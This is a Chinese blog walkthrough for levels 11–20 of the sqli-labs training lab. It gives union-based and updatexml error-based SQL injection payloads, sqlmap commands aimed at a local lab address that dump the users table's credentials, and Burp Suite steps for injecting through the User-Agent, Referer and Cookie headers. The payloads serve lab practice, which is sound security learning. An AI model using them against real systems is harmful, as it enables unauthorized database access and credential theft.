sqllabs 10到20关解法

已于 2023-09-11 16:02:51 修改
阅读量137 收藏
点赞数 1
分类专栏: 安全学习 文章标签: web安全
于 2023-09-05 19:39:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/j2941174356/article/details/132698946
版权
  • 11-15 关为联合查询
    1. 判断闭合符号,看是否存在注入点
    2. 根据报错提示 得出 闭合符号为 ‘
    3. 判断数据列数  为 2
    1. 使用 # 号进行注释 因为 # 注释在  没有与注释内容之间没有空格的地方也生效 , 而 -- 注释 必须又有空格 隔开注释内容
    2. 使用联合查询
      1. 查询表 
        1. 1 ' union select (select group_concat(table_name) from information_schema.tables where table_schema =database() ),version()#
      1. 查询列 
        1. 1 ' union select (select group_concat(column_name) from information_schema.columns where table_schema =database()and table_name ='users' ),version()#
      1. 查询数据 
        1. 1 ' union select (select group_concat(username,0x7e,passworld) from security.users ),version()#
  • 15-16 使用sqlmap实现注入 或者使用布尔盲注
    1. 上传数据爆破数据库 
      1. ​
sqlmap -u http://192.168.124.53/sqllabs/Less-15/ --data "uname=1&passwd=11&Submit=submit" --dbs --batch
    1. 爆破表 
      1. 
sqlmap -u http://192.168.124.53/sqllabs/Less-15/ --data "uname=1&passwd=11&Submit=submit" -D 'security'  -tables  --batch
    2. 爆破列 
      1. sqlmap -u http://192.168.124.53/sqllabs/Less-15/ --data "uname=1&passwd=11&Submit=submit" -D 'security'  -T 'users' -coulmns  --batch
    3. 爆破数据 
      1. ​sqlmap -u http://192.168.124.53/sqllabs/Less-15/ --data "uname=1&passwd=11&Submit=submit" -D 'security'  -T 'users' -C 'uusername ,passworld' --dump --batch
​
  • 17-20 关 使用报错注入 (报错注入的点不同)
    1. 17关报错注入点为 密码输入栏  而且账号要 正确
      1. 报错注入表 
        1. 123'  and (updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),1)) #
      2. 报错注入列 
        1. 123'  and (updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema ='security' and table_name='users'),1)) #
    1. 18 关报错点 为 user agent (需要 正确输入密码 和账号)
      2. 通过 burpsuite 抓包
        1. 火狐浏览器抓包
          1. 在 设置  中 网络设置 
        1.  burpsuite 设置
          2. 若还不能抓包 在 火狐浏览器 搜索 about:config 后 搜索  network.proxy.allow_hijacking_localhost  改为 true
          4. 发送给重发器 对 user agent 进行修改
          6. 根据17关报错流程 依次注入
      1. 19关 注入点 为 referer( 需要 正确输入密码 和账号) 和 18关一样
      2. 20关 注入点 cookie( 需要 正确输入密码 和账号)和 18关一样
  • 评论点赞,一起探讨吧!
雨季小朋友
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十sqllabs less-20,sqli-labs less20
sqli-labs 1——20攻略
weixin_45880717的博客
01-18 1178
1~10 GET传输 Less-1联合查询[ ’ ] 优点:查询方便 速度很快 缺点:必须要有显示位 1、判断sql语句中一共返回了多少列 order by 3 --+ 对比如下两张图的显示页面。得知有3列 2、查看显示位 union select 1,2,3 --+ 3、爆数据 union select 1,2,database() ## 当前数据库名 4、爆库名 union...
Sqli-labs靶场第20详解[Sqli-labs-less-20]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 828
设想如果在Cookie尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。登录后会有记录 Cookie 值。在Cookie 处加上*代表注入点。
详细sqli-labs(1-20)通讲解
最新发布
m0_57928318的博客
05-18 1163
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs第二十
m0_73248913的博客
02-16 438
sqlilabs第二十cookie注入
sqlmap过SQLi-LABS靶场 1-10
小明师傅博客
06-04 8063
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
sqlilabs 1-20闯记录
m0_63253040的博客
04-08 4406
sqlilabs1-20wp Less-7 msql传马 今天看wp,研究了一下判断整数型字符型的原理 感觉一种是根据回显的报错判断,另一种就是想办法拿到源代码,直接看语句判断 这里整形就是没有引号和括号包裹的,字符型就是由单双引号和括号组合包裹 整形的判断另外有方法 可以看之前的博客我现在不愿找 字符型判断 直接分别输入单双引号,报错则是该引号包裹 然后再测试括号后面一个括号一个括号加,记得加上注释,不报错的时候就对了 这题第七则是一个单引号加上两个括号')) 然后这题
【史上最全sqlmap通sqli-labs靶场教程】
DMXA的博客
10-15 3042
【史上最全sqlmap通sqli-labs靶场教程】
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
SQL查询连续号码段的巧妙解法
09-11
SQL查询连续号码段的巧妙解法 在ITPUB上有一则非常巧妙的SQL技巧,学习一下,记录在这里。该技巧旨在解决如何查询连续号码段的问题。下面是问题的背景和解决方案。 问题背景: 有一个表结构,包含两个字段:fphm...
点灯游戏N3解法视频.mp4
02-24
3*3解法: 第一行13第二行2第三行13. 4*4解法: 第一行13第二行2第三行134第四行34 5*5解法: 第一行134第二行234第三行123第四行1245第五行45. 6*6解法: 第一行1346第二行2345第三行123456第四行123456第五行2345...
点灯游戏N解法视频.mp4
02-24
3*3解法: 第一行13第二行2第三行13. 4*4解法: 第一行13第二行2第三行134第四行34 5*5解法: 第一行134第二行234第三行123第四行1245第五行45. 6*6解法: 第一行1346第二行2345第三行123456第四行123456第五行2345...
(sqlmap)【sqli-labs11-20】爆破本地数据文件
07-07 1253
【SQLMAP-数据本地爆破】
(sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3569
【sqlmap-跑盲注靶场】
SQL注入:sqli-labs靶场通(1-37
qq_68163788的博客
02-03 5433
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqlilabs通教程(1-10)(sqlmap+简单代码审计)持续更新
m0_52328368的博客
09-11 436
首先爆数据库名:--dbs是爆数据库名,--batch直接默认输入,就不用我们默认输入Y了。下面的代码29行看到只用一个'就形成闭合了,但是36行不显示内容,这里可以用到报错注入。id=1'就闭合成功,后面看到页面只返回对和错,所以这里要用布尔盲注。id=1即可,其余和第一一模一样。换成id=1')--+即可,其余和第一一摸一样。只用‘就构造成功了,成功闭合,这里也是布尔盲注。sqlmap直接跑就行了,和第一一摸一样。只要把上一'换成"即可,其他都一样。和上一一样,'换成"即可,其他都一样。
sqlmap过SQLi-LABS靶场 11-20
小明师傅博客
06-05 3631
第11 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12 一模一样 第13 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14 一模一样 15 一模一样 16-20
SQL注入之sqlmap爆破sqli-labs-master
龙乐的专栏
08-23 9865
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。 GET型的sqlmap爆破。 1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://loc
sql-lab 11-20秘籍
weixin_46329549的博客
02-29 384
前言 经过前面10道题的学习与理解,后面的这10道题,会相对来说较容易理解,11-20均为post传递,可以用burrp_suit或者hackbar进行注入。 Less-11 主要运用单引号闭合的联合注入 1.模拟真实环境,DUmp用户使用Dump密码登录, 2.进行注入点的判断。 3.使用 1’ or 1=1#找到他的闭合方式。 4.接下来找出有多少个字段。 ( -1’ order by 3...
sqli-labs第五解法
10-14
sqli-labs第五是一个基于时间的盲注漏洞,需要使用时间延迟来判断SQL语句的执行结果。以下是解题步骤: 1. 在输入框中输入 `' and if(substr(database(),1,1)='s',sleep(5),1)#`,其中 `substr(database(),1,1)` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值